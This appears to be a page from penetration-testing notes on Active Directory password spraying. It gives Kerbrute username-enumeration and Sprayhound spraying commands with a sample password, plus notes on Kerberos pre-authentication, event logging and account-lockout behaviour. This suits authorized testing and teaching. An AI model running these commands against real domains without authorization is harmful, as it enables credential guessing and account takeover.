search

Active Directory Password Spraying

hashtag
Username Enumeration

hashtag
Kerbrute

Install

go install github.com/ropnop/kerbrute@latest

Enumerate usernames from list

kerbrute userenum -d $ADDOMAIN usernames.txt -o username-enum-results.txt
circle-info

To enumerate usernames, Kerbrute sends TGT requests with no pre-authentication. If the KDC responds with a PRINCIPAL UNKNOWN error, the username does not exist. However, if the KDC prompts for pre-authentication, we know the username exists and we move on. This does not cause any login failures so it will not lock out any accounts. This generates a Windows event ID 4768arrow-up-right if Kerberos logging is enabled.

hashtag
Password Spraying

Install Sprayhound

# Kali Linux
sudo apt install sprayhound -y

# Non-Kali
pipx install git+https://github.com/Hackndo/sprayhound.git

Run (Unauthenticated)

sprayhound -U userlist.txt -d $ADDOMAIN -dc $ADCONTROLLER -p 'Summer2024'
triangle-exclamation

Be careful not to lockout accounts! Unauthenticated has no checks for bad password count!

Run (Authenticated)

circle-info

-t 2 is used to stop the guessing when you are two attempts away from the lockout

circle-info

Note that the lockout count will only reset with a valid login even if there is a rule allow more failed attempts after a certain amount of time. Therefore, this doesn't allow you to spay at max frequency.

PreviousSearching SMB SharesNextKerberoasting

Last updated